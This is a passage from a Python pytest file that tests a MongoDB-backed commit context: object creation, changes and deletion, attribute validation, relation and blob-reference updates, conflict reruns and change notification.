blm.fundamental.AccessHolder(super=[True])\n self.sync()\n\n def newcontext(self, user=None):\n if user is None:\n user = self.user\n ctx = commit.CommitContext(self.database, user)\n ctx.setMayChange(True)\n ContextBroker().pushContext(ctx)\n return ctx\n\n def commit(self):\n ctx = ContextBroker().context\n ctx.runCommit([], interested=None)\n ContextBroker().popContext()\n self.sync()\n self.newcontext()\n\n def set_primary(self):\n self._database = self.database.client.get_database(\n self.database.name, read_preference=pymongo.ReadPreference.PRIMARY)\n\n def find(self, query, collection=None):\n collection = collection or self.database.tois\n return mongo.find(collection, query)\n\n def find_one(self, query, collection=None):\n collection = collection or self.database.tois\n return mongo.find_one(collection, query)\n\n\nclass TestCommitContext(BaseCommitContextTests):\n\n def test_wait_for_commit(self):\n self._commit('interested')\n result, error = commit.wait_for_commit(self.database, 'interested',\n timeout=1)\n assert result\n assert not error\n\n def test_wait_for_commit_timeout(self):\n py.test.raises(commit.Timeout, commit.wait_for_commit,\n self.database, 'interested', timeout=0.1)\n\n class MyException(Exception): pass\n\n py.test.raises(MyException, commit.wait_for_commit,\n self.database, 'interested', onfail=MyException, timeout=0.1)\n\n\n def test_simple(self):\n cctx = commit.CommitContext(self.database)\n\n def test_createToi(self):\n cctx = self.newcontext()\n toi = cctx.createToi(blm.testcommit.Test, cctx.newId(),\n {'name': ['test']})\n\n assert toi.name == ['test']\n assert toi.__class__._query(name='test').run()[0] is toi\n assert self.find({'_toc': 'testcommit.Test'}).count() == 0\n\n ContextBroker().popContext()\n cctx.runCommit([])\n assert self.find({'_toc': 'testcommit.Test'}).count() == 1\n\n def test_canWrite_new_toi(self):\n user = blm.fundamental.AccessHolder()\n cctx = self.newcontext(user=user)\n toi = cctx.createToi(blm.testcommit.Test, cctx.newId(),\n {'name': ['test']})\n self.sync()\n assert toi.name == ['test']\n assert 
toi.__class__._query(name='test').run()[0] is toi\n assert self.find({'_toc': 'testcommit.Test'}).count() == 0\n\n ContextBroker().popContext()\n cctx.runCommit([])\n assert self.find({'_toc': 'testcommit.Test'}).count() == 1\n\n def test_changeToi(self):\n toi = blm.testcommit.Test(name=['test'])\n self.sync()\n\n cctx = self.newcontext()\n # New context, so we have to look it up again\n toi = blm.testcommit.Test._query().run()[0]\n\n toi(extra=['fOo'])\n\n assert toi.extra == ['fOo']\n assert toi.__class__._query(extra='fOo').run()[0] is toi\n assert toi.__class__._query(extra=None).run() == []\n dbtoi, = list(self.database.tois.find({'_toc': 'testcommit.Test'}))\n assert dbtoi.get('extra',[]) == []\n\n ContextBroker().popContext()\n cctx.runCommit([])\n\n dbtoi, = list(self.database.tois.find({'_toc': 'testcommit.Test'}))\n assert dbtoi['extra'] == ['fOo']\n\n def test_changeToi_with_nop_change(self):\n toi = blm.testcommit.Test(name=['test'])\n self.sync()\n\n cctx = self.newcontext()\n # New context, so we have to look it up again\n toi = blm.testcommit.Test._query(_attrList=['name']).run()[0]\n\n toi(name=['fOo'])\n\n assert toi.name == ['fOo']\n assert toi.__class__._query(name='fOo').run()[0] is toi\n assert toi.__class__._query(name=None).run() == []\n dbtoi, = list(self.database.tois.find({'_toc': 'testcommit.Test'}))\n assert dbtoi.get('extra',[]) == []\n\n toi(name=['test']) # Restore to original value\n\n ContextBroker().popContext()\n commit = cctx.runCommit([])\n assert commit.state != 'failed'\n\n dbtoi, = list(self.database.tois.find({'_toc': 'testcommit.Test'}))\n assert dbtoi['name'] == ['test']\n\n def test_deleteToi(self):\n toi = blm.testcommit.Test(name=['text'])\n print(toi, toi.__class__)\n self.sync()\n\n cctx = self.newcontext()\n toi, = blm.testcommit.Test._query().run()\n toi._delete()\n print(toi, toi.__class__)\n assert toi.__class__._query().run() == []\n self.sync()\n assert self.find({'_toc': 'testcommit.Test'}).count() == 1\n\n ContextBroker().popContext()\n cctx.runCommit([])\n\n assert self.find({'_toc': 'testcommit.Test'}).count() == 0\n\n def test_runQuery_simple(self):\n # This is actually already tested by the queries\n # in the above *Toi tests, but we make an explicit test\n # anyway\n blm.testcommit.Test(name=['text'])\n self.sync()\n cctx = self.newcontext()\n\n toi, = blm.testcommit.Test._query(name='text').run()\n name = toi.name[0]\n assert name == 'text'\n\n def test_runQuery_subQuery(self):\n foo = blm.testcommit.Test(name=['foo'])\n blm.testcommit.Test(name=['text'], toiref=[foo])\n self.commit()\n cctx = self.newcontext()\n q = blm.testcommit.Test._query(\n toiref=blm.testcommit.Test._query(name='foo'))\n toi, = q.run()\n assert toi.name == ['text']\n\n def test_requestAttribute(self):\n cctx = self.newcontext()\n\n toi = blm.fundamental.AccessHolder._query().run()[0]\n attrVal = cctx.requestAttribute(toi, blm.fundamental.AccessHolder.super)\n assert attrVal == [True]\n\n toi = blm.testcommit.Test(name=['text'])\n attrVal = cctx.requestAttribute(toi, blm.testcommit.Test.name)\n assert attrVal == ['text']\n\n def test_requestAttribute_with_toi_deleted(self):\n cctx = self.newcontext()\n\n toi = blm.testcommit.Test(name=['foo'])\n toi._delete()\n\n py.test.raises(RuntimeError, cctx.requestAttribute, toi, None)\n\n def test_preloadAttributes(self):\n py.test.skip('Not really useful, remove it?')\n\n def test_validateAttrValues_simple(self):\n cctx = self.newcontext()\n\n toi1 = blm.testcommit.RestTest(name=['test'])\n value = ['foo']\n rval 
= cctx.validateAttrValues(toi1, toi1.name, value)\n assert rval == value\n py.test.raises(ClientError, cctx.validateAttrValues, toi1,\n toi1.name, [])\n py.test.raises(ClientError, cctx.validateAttrValues, toi1,\n toi1.name, ['foo', 'bar'])\n\n def test_validateAttrValues_readonly(self):\n toi1 = blm.testcommit.Test(name=['test'])\n cctx = self.newcontext()\n\n py.test.raises(ClientError, cctx.validateAttrValues,\n None, blm.testcommit.Test.readonly, ['foo'])\n\n toi1 = blm.testcommit.Test._query(name='test').run()[0]\n py.test.raises(ClientError, cctx.validateAttrValues,\n toi1, blm.testcommit.Test.readonly, ['foo'])\n\n def test_validateAttrValues_computed(self):\n toi1 = blm.testcommit.Test(name=['test'])\n cctx = self.newcontext()\n\n py.test.raises(ClientError, cctx.validateAttrValues,\n None, blm.testcommit.Test.computed, ['foo'])\n\n toi1 = blm.testcommit.Test._query(name='test').run()[0]\n py.test.raises(ClientError, cctx.validateAttrValues,\n toi1, blm.testcommit.Test.computed, ['foo'])\n\n def test_validateAttrValues_unchangeable(self):\n toi1 = blm.testcommit.Test(name=['test'])\n cctx = self.newcontext()\n\n value = ['foo']\n rval = cctx.validateAttrValues(None, blm.testcommit.Test.unchangeable,\n ['foo'])\n assert value == rval\n\n toi1 = blm.testcommit.Test._query(name='test').run()[0]\n # XXX unchangeable is tested against what (if any) change\n # has been made in the toi!\n toi1.unchangeable = ['foo']\n py.test.raises(ClientError, cctx.validateAttrValues,\n toi1, blm.testcommit.Test.unchangeable, None)\n\n def test_validateAttrValues_weakref(self):\n # Check that deleted tois are dropped\n cctx = self.newcontext()\n\n toi1 = blm.testcommit.Test(name=['toi1'])\n toi2 = blm.testcommit.Test(name=['toi2'])\n toi3 = blm.testcommit.Test(name=['toi3'])\n toi3._delete()\n\n value = [toi1, toi2, toi3]\n rval = cctx.validateAttrValues(toi1, blm.testcommit.Test.weakref,\n value)\n assert rval == [toi1, toi2]\n\n def test_validateAttrValues_reorder(self):\n toi1 = blm.testcommit.Test(name=['toi1'], reorder=['a','b','c'])\n self.sync()\n\n cctx = self.newcontext()\n toi1, = blm.testcommit.Test._query(name='toi1').run()\n\n py.test.raises(ClientError, cctx.validateAttrValues,\n toi1, toi1.reorder, ['a'])\n\n value = ['c','b','a']\n rval = cctx.validateAttrValues(toi1, toi1.reorder, value)\n assert value == rval\n\n def test_validateAttrValues_unique(self):\n cctx = self.newcontext()\n\n toi1 = blm.testcommit.Test(name=['toi1'],\n unique=['toi1'])\n py.test.raises(ClientError, cctx.validateAttrValues, None,\n toi1.unique, ['toi1'])\n\n value = ['toi1']\n rval = cctx.validateAttrValues(toi1, toi1.unique, value)\n assert rval == value\n\n def test_validateAttrValues_simple_toitype(self):\n cctx = self.newcontext()\n\n toi1 = blm.testcommit.Test(name=['toi1'])\n py.test.raises(ClientError, cctx.validateAttrValues, None,\n toi1.simpleToiType, [toi1])\n toi1.name = ['test']\n value = [toi1]\n rval = cctx.validateAttrValues(None, toi1.simpleToiType, value)\n assert value == rval\n\n def test_validateAttrValues_toiref_exists(self):\n cctx = self.newcontext()\n\n toi1 = blm.testcommit.Test(name=['toi1'])\n phantom = blm.testcommit.Test._create(ObjectId())\n value = [phantom]\n rval = cctx.validateAttrValues(None, toi1.toiref, value, pre=True)\n assert rval == value\n\n # do not accept phantom tois in database\n py.test.raises(ClientError, cctx.validateAttrValues, None,\n toi1.toiref, value, pre=False)\n\n def test_validateAttrValues_complex_toitype(self):\n cctx = self.newcontext()\n\n toi1 = 
blm.testcommit.Test(name=['toi1'])\n toi2 = blm.testcommit.Other(name=['toi2'])\n toi3 = blm.testcommit.Test(name=['toi3'],\n toiref = [toi2])\n\n py.test.raises(ClientError, cctx.validateAttrValues, None,\n toi1.complexToiType, [ toi1 ])\n\n toi1.complexToiType = [toi3]\n py.test.raises(ClientError, cctx.validateAttrValues, None,\n toi1.complexToiType, [ toi3 ])\n\n q = blm.testcommit.Test._query(toiref =\n blm.testcommit.Other._query(name='test'),\n id = [toi3])\n\n toi2.name = ['test']\n value = [toi3]\n rval = cctx.validateAttrValues(None, toi1.complexToiType, value)\n assert rval == value\n\n def test_validateAttrValues_toirefmap(self):\n cctx = self.newcontext()\n\n toi1 = blm.testcommit.Test(name=['toi1'])\n toi2 = blm.testcommit.Test(name=['toi2'],\n toirefmap={'toi1': toi1})\n\n value = {'foo': toi2}\n rval = cctx.validateAttrValues(None, toi1.toirefmap, value)\n assert rval == value\n\n def test_findRelatedAttr(self):\n cctx = self.newcontext()\n\n toi1 = blm.testcommit.Other(name=['other'])\n toi2 = blm.testcommit.Related()\n\n rval = cctx.findRelatedAttr(toi1, toi2, toi1.related)\n assert rval == toi2.other\n\n def test_updateRelations(self):\n toi1 = blm.testcommit.Other(name=['other'])\n toi2 = blm.testcommit.Related(name=['related'],\n other=[toi1])\n toi1.related = [toi2] # Simple commit context doesn't fix this\n self.sync()\n\n cctx = self.newcontext()\n toi1 = blm.testcommit.Other._query().run()[0]\n\n toi2 = blm.testcommit.Related._query(name=['related']).run()[0]\n\n toi3 = blm.testcommit.Related(name=['releated3'],\n other=[toi1])\n\n self.commit()\n toi1 = blm.testcommit.Other._query(id=toi1.id).run()[0]\n assert toi1.related == [toi2, toi3]\n\n toi2 = blm.testcommit.Related._query(id=toi2.id).run()[0]\n toi2.other = []\n self.commit()\n\n toi1 = blm.testcommit.Other._query(id=toi1.id).run()[0]\n assert toi1.related == [toi3]\n\n toi2 = blm.testcommit.Related._query(id=toi2.id).run()[0]\n toi2._orgAttrData['other'] = [] # pretend it changed in DB\n\n toi2.other = [toi1]\n self.commit()\n\n toi1 = blm.testcommit.Other._query(id=toi1.id).run()[0]\n assert toi1.related == [toi3, toi2]\n\n toi2 = blm.testcommit.Related._query(id=toi2.id).run()[0]\n toi2._orgAttrData['other'] = [toi1]\n toi2.other = []\n toi2._delete()\n self.commit()\n\n toi1 = blm.testcommit.Other._query(id=toi1.id).run()[0]\n assert toi1.related == [toi3]\n\n def test_commitRelations(self):\n self.newcontext()\n toi1 = blm.testcommit.Other(name=['other'])\n toi2 = blm.testcommit.Related(name=['related'], other=[toi1])\n self.commit()\n\n toi1, = blm.testcommit.Other._query(id=toi1.id).run()\n assert toi1.related == [toi2]\n\n toi2, = blm.testcommit.Related._query(id=toi2.id).run()\n toi2.other = []\n toi2._delete()\n self.commit()\n\n toi1, = blm.testcommit.Other._query(id=toi1.id).run()\n assert toi1.related == []\n\n self.newcontext()\n toi1 = blm.testcommit.OtherWeak()\n toi2 = blm.testcommit.Related(name=['related'], weak=[toi1])\n self.commit()\n\n toi1, = blm.testcommit.OtherWeak._query(id=toi1.id).run()\n assert toi1.related == [toi2]\n\n toi2, = blm.testcommit.Related._query(id=toi2.id).run()\n toi2._delete()\n self.commit()\n\n toi1, = blm.testcommit.OtherWeak._query(id=toi1.id).run()\n assert toi1.related == []\n\n def test_updateBlobs(self):\n self.newcontext()\n val1 = BlobVal('foo')\n val1.large_blob = 2\n toi = blm.testcommit.Test(blob=[val1])\n self.commit()\n\n assert val1.references == {toi.id[0]}\n\n self.newcontext()\n\n ref = ObjectId()\n val1.addref(ref)\n self.sync()\n\n toi, = 
blm.testcommit.Test._query().run()\n\n val1 = toi.blob[0]\n val2 = BlobVal('foo')\n val2.large_blob = 2\n toi.blob = [val2]\n self.commit()\n self.sync()\n\n assert val1.references == {ref}\n assert val2.references == {toi.id[0]}\n\n self.newcontext()\n\n toi, = blm.testcommit.Test._query().run()\n val2 = toi.blob[0]\n\n toi._delete()\n self.commit()\n self.sync()\n\n assert val2.references == set()\n\n py.test.raises(Exception, gridfs.GridFS(self.database, 'blobvals').get, val2.value._id)\n\n\n def test_runAfterCommit(self):\n py.test.xfail(\"post-commit hooks not supported\")\n callbackCalled = []\n def callback(tid, *args, **kw):\n callbackCalled.append((tid, args, kw))\n\n class Op(commit.OperateBase):\n def checkPermissions(self, context):\n pass\n def operate(self, context):\n context.runAfterCommit(callback, 42, foo='bar')\n\n cctx = commit.CommitContext(self.database)\n ContextBroker().pushContext(cctx)\n cctx.setMayChange(True)\n\n results = cctx.runCommit([Op()])\n\n assert callbackCalled == [(None, (42,), {'foo':'bar'})]\n\n def test_runAfterCommitFailing(self):\n py.test.xfail(\"post-commit hooks not supported\")\n callbackCalled = []\n def callback(tid, *args, **kw):\n callbackCalled.append((tid, args, kw))\n raise RuntimeError('error')\n def callback2(tid, *args, **kw):\n callbackCalled.append((tid, args, kw))\n\n class Op(commit.OperateBase):\n def checkPermissions(self, context):\n pass\n def operate(self, context):\n context.runAfterCommit(callback, 42, foo='bar')\n context.runAfterCommit(callback2, 43)\n\n cctx = commit.CommitContext(self.database)\n ContextBroker().pushContext(cctx)\n cctx.setMayChange(True)\n\n results = cctx.runCommit([Op()])\n\n assert callbackCalled == [(None, (42,), {'foo':'bar'}),\n (None, (43,), {})]\n\n def test_notifyChanges_being_called(self):\n result = []\n def notifyChanges(commits):\n result.append([c._id for c in commits])\n\n cctx = self.newcontext()\n cctx.id = None # cheat - pretend that this commit is unhandled\n commit1 = cctx.createCommit([], [])\n commit1.save(self.database)\n ContextBroker().popContext()\n\n cctx = self.newcontext()\n commit2 = cctx.createCommit([], [])\n ContextBroker().popContext()\n\n cctx.notifyChanges = notifyChanges\n cctx.processCommits(commit2)\n\n expected = [[commit2._id, commit1._id]]\n assert result == expected\n\n def test_runCommit(self):\n op = commit.CallBlm('testcommit', 'simple', [['bar']])\n cctx = self.newcontext()\n cctx.runCommit([op])\n\n def test_runCommit_error(self):\n op = commit.CallBlm('testcommit', 'broken', [])\n cctx = self.newcontext()\n cmt = cctx.runCommit([op])\n assert cmt.error\n\n def test_runCommit_createCommit_fail(self, monkeypatch):\n def createCommit(*args, **kw):\n kw['args'] = args\n kw['_id'] = ObjectId()\n return kw\n\n op = commit.CallBlm('testcommit', 'simple', [['bar']])\n cctx = self.newcontext()\n\n monkeypatch.setattr(cctx, 'createCommit', createCommit)\n\n op = commit.CallBlm('testcommit', 'broken', [])\n cctx = self.newcontext()\n cmt = cctx.runCommit([op], processCommits=False)\n assert cmt.error.message == 'broken'\n\n def test_runCommit_error_with_interest(self):\n op = commit.CallBlm('testcommit', 'broken', [])\n cctx = self.newcontext()\n interested = ObjectId()\n cmt = cctx.runCommit([op], interested=interested)\n assert cmt.error\n self.sync()\n stored = mongo.find_one(self.database.commits, {'_id': cmt._id})\n assert type(cmt.error) == type(stored['error'])\n assert cmt.error.args == stored['error'].args\n\n def test_createCommit(self):\n cctx = 
self.newcontext()\n toi1 = blm.testcommit.Test(name=['foo'])\n toi2 = blm.testcommit.Test(name=['bar'])\n toi3 = blm.testcommit.Test(name=['baz'])\n toi1._orgAttrData = { 'name': ['apa'] }\n\n cctx.changedTois = { toi1.id[0]: toi1 }\n cctx.newTois = { toi2.id[0]: toi2 }\n cctx.deletedTois = {toi3.id[0]: toi3}\n cctx.indexData = [(toi1.id[0], {'toid': toi1.id[0],\n 'data': ['foo', 'bar']})]\n bval1 = BlobVal('x')\n bval2 = BlobVal('y')\n bval3 = BlobVal('z')\n\n cctx.addedBlobVals = { str(toi1.id[0]): [bval1]}\n cctx.deletedBlobVals = { str(toi2.id[0]): [bval2]}\n\n ops = [commit.CallBlm('foo', 'bar', [[bval3]])]\n\n cmt = cctx.createCommit(ops, [['result']], interested='interested')\n\n assert cmt.user == cctx.user != None\n assert set(cmt.deletedTois) == set([toi3.id[0]])\n diff = DiffTOI()\n diff.setAttrDiff(toi2.__class__, toi2.id[0],\n {'name': []}, {'name': ['bar']})\n assert cmt.newTois == [diff]\n diff = DiffTOI()\n diff.setAttrDiff(toi1.__class__, toi1.id[0],\n {'name': ['apa']}, {'name': ['foo']})\n assert cmt.changedTois == [diff]\n assert cmt.indexData == [(toi1.id[0], {'toid': toi1.id[0],\n 'data': ['foo', 'bar']})]\n assert cmt.addedBlobVals == { str(toi1.id[0]): [bval1]}\n assert cmt.deletedBlobVals == { str(toi2.id[0]): [bval2]}\n assert cmt.operations == ops\n assert cmt.results == [['result']]\n assert cmt.interested == 'interested'\n assert cmt.error is None\n\n assert bval1.references == {cmt._id}\n assert bval2.references == {cmt._id}\n assert bval3.references == {cmt._id}\n\n def test_createCommit_error(self):\n cctx = self.newcontext()\n toi1 = blm.testcommit.Test(name=['foo'])\n toi2 = blm.testcommit.Test(name=['bar'])\n toi3 = blm.testcommit.Test(name=['baz'])\n toi1._orgAttrData = { 'name': ['apa'] }\n\n cctx.changedTois = { toi1.id[0]: toi1 }\n cctx.newTois = { toi2.id[0]: toi2 }\n cctx.deletedTois = {toi3.id[0]: toi3}\n cctx.indexData = [(toi1.id[0], {'toid': toi1.id[0],\n 'data': ['foo', 'bar']})]\n\n ops = []\n error = ClientError()\n commit = cctx.createCommit(ops, [['result']], error=error)\n assert commit.newTois == []\n assert commit.changedTois == []\n assert commit.deletedTois == []\n assert commit.indexData == []\n assert commit.results == []\n assert commit.error is error\n\n def test_createCommit_bad_doc(self):\n cctx = self.newcontext()\n toi1 = blm.testcommit.Test(name=['foo'*8*1024*1024]) # 24MB\n cctx.newTois = { toi1.id[0]: toi1 }\n\n ops = [commit.CallBlm('foo', 'bar', [])]\n\n cmt = cctx.createCommit(ops, [['result']], interested='interested')\n # Will fail when commit is saved\n\n\n def _commit(self, interested=None, _id=ObjectId(), operations=[],\n result=[['result'], 42], error=None):\n toiToDelete = blm.testcommit.Test(name=['baz'])\n toiToChange = blm.testcommit.Test(name=['foo'])\n cctx = self.newcontext()\n toiToCreate = blm.testcommit.Test(name=['bar'])\n\n new = DiffTOI()\n new.setToi(toiToCreate)\n\n changed = DiffTOI()\n changed.setAttrDiff(toiToChange.__class__, toiToChange.id[0],\n toiToChange._attrData, {'name': ['apa']})\n doc = {'_id': _id,\n 'newTois': [new],\n 'changedTois': [changed],\n 'deletedTois': [toiToDelete.id[0]],\n 'operations': operations,\n 'addedBlobVals': {},\n 'deletedBlobVals': {},\n 'results': result,\n 'error': error,\n 'indexData': [],\n 'handled_by': cctx.id,\n 'user': cctx.user,\n 'interested': interested}\n commitId = mongo.insert(self.database.commits, doc)\n assert commitId\n self.sync()\n ContextBroker().popContext()\n\n assert self.find_one({'_id': toiToChange.id[0]})['name'] == ['foo']\n assert not 
self.find_one({'_id': toiToCreate.id[0]})\n assert self.find_one({'_id': toiToDelete.id[0]})\n cctx.commit(commit.Commit.fromquery(self.database, {'_id': commitId}))\n self.sync()\n\n assert self.find_one({'_id': toiToChange.id[0]})['name'] == ['apa']\n assert self.find_one({'_id': toiToCreate.id[0]})\n assert not self.find_one({'_id': toiToDelete.id[0]})\n return commitId\n\n def test_commit_without_interest_successful(self):\n commitId = self._commit()\n assert not mongo.find_one(self.database.commits, {'_id': commitId})\n\n def test_commit_with_interest_successful(self):\n commitId = self._commit(interested=[1, 2])\n commit = mongo.find_one(self.database.commits, {'_id': commitId})\n assert commit['handled_by'] == commit['interested'] == [1, 2]\n assert commit['state'] == 'done'\n assert commit['results'] == [['result'], 42]\n\n def test_commit_with_interest_error(self):\n commitId = self._commit(interested=[1, 2], result=[None], error='error')\n commit = mongo.find_one(self.database.commits, {'_id': commitId})\n assert commit['handled_by'] == commit['interested'] == [1, 2]\n assert commit['state'] == 'done'\n assert commit['results'] == [None]\n assert commit['error'] == 'error'\n\n def test_commit_blobval_reference_handling(self):\n commitId = ObjectId()\n bv1 = BlobVal('foo')\n bv2 = BlobVal('bar')\n bv3 = BlobVal('baz')\n bv1.large_blob = bv2.large_blob = bv3.large_blob = 2\n bv1.addref(commitId)\n bv3.addref(commitId)\n\n op = commit.CallToi(ObjectId(), 'foo', [[bv1, bv3]])\n result = [[bv2, bv3, 'baz']]\n commitId = self._commit(interested=[1, 2], _id=commitId, operations=[op],\n result=result)\n cmt = mongo.find_one(self.database.commits, {'_id': commitId})\n\n py.test.raises(gridfs.NoFile, bv1.gridfs(self.database).get, bv1.value._id)\n assert cmt['results'][0][0].references == {commitId}\n assert cmt['results'][0][1].references == {commitId}\n\n def test_commit_with_mongodb_error(self):\n self.set_primary()\n self.database.previous_error = lambda : {'err': 'ohnoes!', 'code': 123}\n err = py.test.raises(OperationFailure, self._commit)\n assert err.value.args[0] == 'ohnoes!'\n assert err.value.code == 123\n\n def test_commit_already_in_progress(self):\n toi = blm.testcommit.Test(name=['foo'])\n mongo.find_and_modify(self.database.tois, {'_id': toi.id[0]},\n {'$set': {'_handled_by': ObjectId()}})\n self.sync()\n cctx = self.newcontext()\n toi, = blm.testcommit.Test._query(name=['foo']).run()\n toi(name=['bar'])\n py.test.raises(commit.ToisLocked, cctx.commit,\n cctx.createCommit([], []))\n\n def test_rerun_conflicting_commit(self):\n toi = blm.testcommit.Test(name=['foo'])\n self.sync()\n assert self.find_one({'_id': toi.id[0]})\n cctx = self.newcontext()\n op = commit.CallToi(toi.id[0], 'add', [['bar']])\n commitId = cctx.runCommit([op], processCommits=False)\n ContextBroker().popContext()\n toi.extra = ['conflict']\n self.sync()\n\n _rerunCommit = cctx.rerunCommit\n def rerunCommit(*args, **kw):\n db_toi_data = self.find_one({'_id': toi.id[0]})\n assert db_toi_data.get('_terms', []) == []\n return _rerunCommit(*args, **kw)\n cctx.rerunCommit = rerunCommit\n\n cctx.processCommits(commitId)\n self.sync()\n\n cctx = self.newcontext()\n toi, = blm.testcommit.Test._query().run()\n assert toi.extra == ['conflict', 'bar']\n\n db_toi_data = self.find_one({'_id': toi.id[0]})\n py.test.skip('full text index disabled for now')\n assert db_toi_data['_terms'] == [{'toid': toi.id[0],\n 'data': ['bar', 'conflict']}]\n\n def test_rerun_locked_tois_commit_self(self):\n toi = 
blm.testcommit.Test(name=['foo'])\n cctx = self.newcontext()\n op = commit.CallToi(toi.id[0], 'add', [['bar']])\n commitId = cctx.runCommit([op], processCommits=False)\n\n # toi is locked by a commit already, abuse the fact that\n # locked toi check does not care about who has locked it, so\n # using commit context's own ID which will be removed by\n # unlocking\n mongo.find_and_modify(self.database.tois, {'_id': toi.id[0]},\n {'$set': {'_handled_by': cctx.id}})\n\n cctx.processCommits(commitId)\n self.sync()\n\n cctx = self.newcontext()\n toi, = blm.testcommit.Test._query().run()\n assert toi.extra == ['bar']\n\n def test_mark_failed_commits(self):\n cctx = self.newcontext()\n def commit(commit):\n raise RuntimeError('everything broke')\n cctx.commit = commit\n commit = cctx.runCommit([])\n commit = self.find_one({'_id': commit._id}, self.database.commits)\n assert commit['state'] == 'failed'\n assert 'everything broke' in commit['traceback']\n error = commit['error']\n assert isinstance(error, BlError)\n\n def test_failure_timeout_on_toislocked(self):\n cctx = self.newcontext()\n def ct(c):\n raise commit.ToisLocked()\n cctx.commit = ct\n py.test.raises(commit.Timeout, cctx.runCommit, [])\n\n def test_failure_timeout_on_conflict(self):\n cctx = self.newcontext()\n def ct(c):\n raise commit.CommitConflict('toi', 'diff')\n cctx.commit = ct\n py.test.raises(commit.Timeout, cctx.runCommit, [])\n\n def test_saveIndexData(self):\n py.test.skip('full text index disabled for now')\n cctx = self.newcontext()\n toid = ObjectId()\n child1 = ObjectId()\n child2 = ObjectId()\n mongo.insert(self.database.tois, {'_id': toid})\n\n get_stored = lambda : sorted(self.find_one({'_id': toid})['_terms'])\n\n indexData = [(toid, [{'toid': toid, 'data': ['foo']}])]\n expect = [{'toid': toid, 'data': ['foo']}]\n cctx.saveIndexData(indexData)\n assert get_stored() == expect\n\n indexData = [(toid, [{'toid': toid, 'data': ['foo']},\n {'toid': child1, 'data': ['bar']}])]\n expect = sorted([{'toid': toid, 'data': ['foo']},\n {'toid': child1, 'data': ['bar']}])\n cctx.saveIndexData(indexData)\n assert get_stored() == expect\n\n indexData = [(toid, [{'toid': child1, 'data': ['bar', 'baz']},\n {'toid': child2, 'data': ['qux']}])]\n expect = sorted([{'toid': toid, 'data': ['foo']},\n {'toid': child1, 'data': ['bar', 'baz']},\n {'toid': child2, 'data': ['qux']}])\n cctx.saveIndexData(indexData)\n assert get_stored() == expect\n\n\nclass TestNotifyChanges(BaseCommitContextTests):\n\n def setup_method(self, method):\n super(TestNotifyChanges, self).setup_method(method)\n self.time = Time()\n\n def teardown_method(self, method):\n super(TestNotifyChanges, self).teardown_method(method)\n self.time.restore()\n\n def test_requests(self):\n toid1 = ObjectId()\n toid2 = ObjectId()\n toid3 = ObjectId()\n\n link1 = mongo.insert(self.database.links,\n {'type': 'LinkRequest', 'params': { 'toid': toid1}})\n link2 = mongo.insert(self.database.links,\n {'type': 'LinkRequest', 'params': { 'toid': toid2}})\n link3 = mongo.insert(self.database.links,\n {'type': 'LinkRequest', 'params': { 'toid': toid3}})\n\n cctx = self.newcontext()\n diff = DiffTOI()\n diff.toid = toid1\n diff.diffAttrs['allowRead'] = [Fake(id=[ObjectId()])]\n cid1, cid2 = ObjectId(), ObjectId()\n commits = [commit.Commit.fromdoc(self.database,\n {'_id': cid1,\n 'changedTois': [diff],\n 'deletedTois': [],\n 'newTois': []}),\n commit.Commit.fromdoc(self.database,\n {'_id': cid2,\n 'changedTois': [],\n 'deletedTois': [toid2],\n 'newTois': []})]\n 
cctx.notifyChanges(commits)\n self.sync()\n\n outdated = self.find({'outdatedBy': {'$ne': None}}, self.database.links)\n assert outdated.count() == 2\n outdated = list(outdated)\n assert {link['_id'] for link in outdated} == {link1, link2}\n assert outdated[0]['outdatedBy'] == cid2\n assert outdated[1]['outdatedBy'] == cid2\n\n def test_sorted_query_by_allow_read(self):\n user1 = blm.fundamental.AccessHolder()\n user2 = blm.fundamental.AccessHolder()\n toi1 = blm.testcommit.Test(name=['test'], allowRead=[user1])\n toi2 = blm.testcommit.Test(name=['test'], allowRead=[user2])\n toi3 = blm.testcommit.Test(name=['test'])\n self.commit()\n\n link1 = mongo.insert(self.database.links,\n {'type': 'LinkSortedQuery', 'allowRead': user1.id,\n 'timestamp': self.time.now, 'ancient': False})\n link2 = mongo.insert(self.database.links,\n {'type': 'LinkSortedQuery', 'allowRead': user2.id,\n 'timestamp': self.time.now, 'ancient': False})\n link3 = mongo.insert(self.database.links,\n {'type': 'LinkSortedQuery',\n 'state': {'query': [{'id': toi3.id[0]}]},\n 'allowRead': [ObjectId()],\n 'timestamp': self.time.now, 'ancient': False})\n link4 = mongo.insert(self.database.links,\n {'type': 'LinkSortedQuery',\n 'ancient': False,\n 'allowRead': user1.id,\n 'outdatedToids': [ObjectId()],\n 'timestamp': self.time.now -\n commit.CommitContext.link_old_age - 1})\n\n cctx = self.newcontext()\n diff = DiffTOI()\n diff.toid = toi1.id[0]\n cid = ObjectId()\n commits = [commit.Commit.fromdoc(self.database,\n {'_id': cid,\n 'changedTois': [diff],\n 'deletedTois': toi3.id,\n 'newTois': []})]\n cctx.notifyChanges(commits)\n self.sync()\n\n outdated = self.find({'outdatedBy': {'$ne': None}}, self.database.links)\n outdated = dict((link['_id'], link) for link in outdated)\n assert len(outdated) == 3\n assert set(outdated) == {link1, link3, link4}\n\n assert outdated[link1]['outdatedBy'] == cid\n assert outdated[link3]['outdatedBy'] == cid\n assert outdated[link4]['outdatedBy'] == cid\n assert set(outdated[link1]['outdatedToids']) == {toi1.id[0], toi3.id[0]}\n assert set(outdated[link3]['outdatedToids']) == {toi1.id[0], toi3.id[0]}\n assert len(outdated[link4]['outdatedToids']) == 0\n\nclass TestChangeToi(BaseCommitContextTests):\n\n def test_simple(self):\n toi = blm.testcommit.Test(name=['foo'])\n self.commit()\n with self.newcontext() as cctx:\n toi = blm.testcommit.Test._query(id=toi.id).run()[0]\n op = commit.ChangeToi(toi, {'name': ['bar']})\n op.operate(cctx)\n\n assert toi.name == ['bar']\n\n def test_commit_deleted(self):\n toi = blm.testcommit.Test()\n self.commit()\n\n ctx1 = commit.CommitContext(self.database)\n ctx1.setMayChange(True)\n with ctx1:\n toi1 = blm.testcommit.Test._query(id=toi.id).run()[0]\n op = commit.ChangeToi(toi1, {'name': ['bar']})\n\n interested = ObjectId()\n c = ctx1.runCommit([op], interested=interested, processCommits=False)\n\n toi._delete()\n self.commit()\n\n ctx1.processCommits(c)\n\n result, error = commit.wait_for_commit(self.database, interested)\n assert error\n\n\nclass TestDeleteToi(BaseCommitContextTests):\n\n def test_simple(self):\n toi = blm.testcommit.Test(name=['foo'])\n self.commit()\n with self.newcontext() as cctx:\n toi = blm.testcommit.Test._query(id=toi.id).run()[0]\n op = commit.DeleteToi(toi)\n op.operate(cctx)\n\n assert toi._deleted\n\n def test_commit_deleted(self):\n toi = blm.testcommit.Test()\n self.commit()\n\n ctx1 